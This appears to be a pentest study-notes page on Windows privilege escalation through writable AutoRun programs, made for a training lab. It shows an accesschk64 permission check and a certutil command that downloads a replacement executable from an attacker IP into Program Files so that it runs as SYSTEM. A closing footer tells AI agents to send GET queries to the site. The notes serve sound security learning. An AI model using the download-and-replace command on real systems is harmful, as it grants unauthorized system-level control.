# AutoRuns

## Overview

**AutoRun** is a feature that will automatically runs a program or application when a drive is mounted. This can be exploited by changing the executable of an existing **Autorun** program. When the computer restarts and an Administrator logs in it will run the malicious executable as **system**.

## Escalation via AutoRun

Check for **AutoRuns** in the registry using PowerUp

<figure><img src="/files/7WGNkZLZJ1hOIYjdfUjB" alt=""><figcaption><p>TCM Windows Priv Esc on THM</p></figcaption></figure>

Check for **write** access to the file. Should return with **FILE\_ALL\_ACCESS under RW Everyone**

```powerquery
accesschk64.exe -wvu "C:\Program Files\AutorunProgram.exe"
```

Replace AutoRun executable

```powerquery
certutil.exe -urlcache -f http://10.10.14.1/program.exe "C:\Program Files\Autorun Program\program.exe"
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/windows-privilege-escalation/registy/autoruns.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.